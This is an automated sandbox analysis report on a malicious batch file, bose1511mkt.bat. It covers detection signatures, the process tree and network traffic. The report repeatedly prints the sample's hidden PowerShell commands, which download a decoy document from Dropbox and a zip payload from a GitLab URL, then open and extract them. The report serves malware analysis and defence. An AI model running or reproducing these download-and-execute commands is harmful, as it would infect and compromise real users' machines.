Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bose1511mkt.bat

Overview

General Information

Sample name:bose1511mkt.bat
Analysis ID:1557411
MD5:b40b86a048f3bba88c572719f1ae5001
SHA1:baeed02a1e335d47a4efd4b7b8d2e6856dfd1dfb
SHA256:2490a87d60150e846b8e2f9289f164f12af7eeb14dcea5650ebb3f596c8c89e8
Tags:batBraodouser-JAMESWT_MHT
Infos:

Detection

Abobus Obfuscator
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected Abobus Obfuscator
Yara detected Powershell download and execute
AI detected suspicious sample
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 2912 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\bose1511mkt.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 2820 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • find.exe (PID: 936 cmdline: fInd MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • findstr.exe (PID: 4896 cmdline: findstr /L /I set "C:\Users\user\Desktop\bose1511mkt.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 5720 cmdline: findstr /L /I goto "C:\Users\user\Desktop\bose1511mkt.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 3416 cmdline: findstr /L /I echo "C:\Users\user\Desktop\bose1511mkt.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 5692 cmdline: findstr /L /I pause "C:\Users\user\Desktop\bose1511mkt.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 5156 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • find.exe (PID: 5336 cmdline: fINd MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 6284 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 5176 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1836 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6452 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/16Fukrun.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3840 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
bose1511mkt.batJoeSecurity_AbobusObfuscatorYara detected Abobus ObfuscatorJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 5176JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 6452JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        SourceRuleDescriptionAuthorStrings
        amsi64_5176.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi64_6452.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\bose1511mkt.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2912, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5176, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\bose1511mkt.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2912, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5176, ProcessName: powershell.exe
            Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6452, TargetFilename: C:\Users\Public\Document.zip
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3840, TargetFilename: C:\Users\Public\Document\tcl\dde1.4\tcldde14.dll
            Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\bose1511mkt.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2912, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5176, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\bose1511mkt.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2912, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5176, ProcessName: powershell.exe
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\bose1511mkt.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2912, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5176, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\bose1511mkt.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2912, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5176, ProcessName: powershell.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://instructorledlearning.dropboxbusiness.com/Avira URL Cloud: Label: phishing
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.4% probability
            Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49752 version: TLS 1.2
            Source: Binary string: C:\Users\Vinay\Projects\simple_launcher\dist\t64.pdb source: powershell.exe, 00000013.00000002.3330232690.000001E0D9B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D9A6A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: tomation.pdb source: powershell.exe, 0000000C.00000002.2229489237.000001F11CCEC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb^ source: powershell.exe, 0000000C.00000002.2249574202.000001F136EAD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2249574202.000001F136EAD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000C.00000002.2249574202.000001F136F25000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bpdbtem.pdb source: powershell.exe, 0000000C.00000002.2248528679.000001F136BE2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: and f.endswith(('.exe', '.pdb'))): source: powershell.exe, 00000013.00000002.3330232690.000001E0D83B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D83C3000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: em.pdbK source: powershell.exe, 0000000C.00000002.2249574202.000001F136F25000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.pdb source: powershell.exe, 0000000C.00000002.2249574202.000001F136F25000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: if not srcfile.endswith(('.exe', '.pdb')): source: powershell.exe, 00000013.00000002.3330232690.000001E0D83B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D83C3000.00000004.00000800.00020000.00000000.sdmp
            Source: global trafficHTTP traffic detected: GET /scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bose1511/mkt1511/-/raw/main/16Fukrun.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
            Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: ipinfo.io
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bose1511/mkt1511/-/raw/main/16Fukrun.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @Policy: style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-ancestors 'self' https://*.dropbox.com ; media-src https://* blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: equals www.yahoo.com (Yahoo)
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ne' 'unsafe-eval' ; img-src https://* data: blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-ancestors 'self' https://*.dropbox.com ; media-src https://* blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: equals www.yahoo.com (Yahoo)
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-ancestors 'self' https://*.dropbox.com ; media-src https://* blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; worker-src https://www.dropbox.com/static/serviceworker/ 